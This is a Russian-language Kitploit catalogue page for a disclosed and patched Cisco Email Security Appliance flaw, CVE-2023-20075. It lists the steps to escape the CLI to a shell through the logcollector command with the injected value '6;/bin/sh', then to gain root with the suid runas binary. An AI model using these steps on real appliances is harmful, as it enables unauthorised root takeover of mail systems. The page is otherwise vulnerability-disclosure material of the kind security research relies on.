Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cisco-CVE-2023-20075 — Cisco Email Security Appliance: локальное повышение привилегий и побег из оболочки | Kitploit
Инструменты/GitHubGitHub/ly1g3/cisco-cve-2023-20075
Повышение привилегийАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubly1g3/cisco-cve-2023-20075

cisco-CVE-2023-20075

Cisco Email Security Appliance: локальное повышение привилегий и побег из оболочки

Репозиторий
112 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

О программе

Исследователь безопасности: ly1g3, ly1g3[at]tuta.io

Отпечаток GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Обзор: Повышение привилегий в локальной системе и выход из оболочки

CVE: CVE-2023-20075

Хронология:

  • Обнаружено - ly1g3
  • Сообщено - ly1g3
  • Исправлено - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email)

Повышение привилегий - из CLI в root-оболочку

Аутентифицированный пользователь с доступом к CLI может повысить привилегии до root и выполнить произвольный код

Шаги для получения оболочки

  1. В CLI выполните команду logcollector
  2. Нажмите 3
  3. Введите значение: 6;/bin/sh
  4. Оболочка от имени пользователя

Шаги для получения root

  1. Из оболочки запустите suid-бинарник runas
  2. /data/release/phoebe-14*/bin/runas 0 /bin/sh
  3. Оболочка от имени root
Скачать инструмент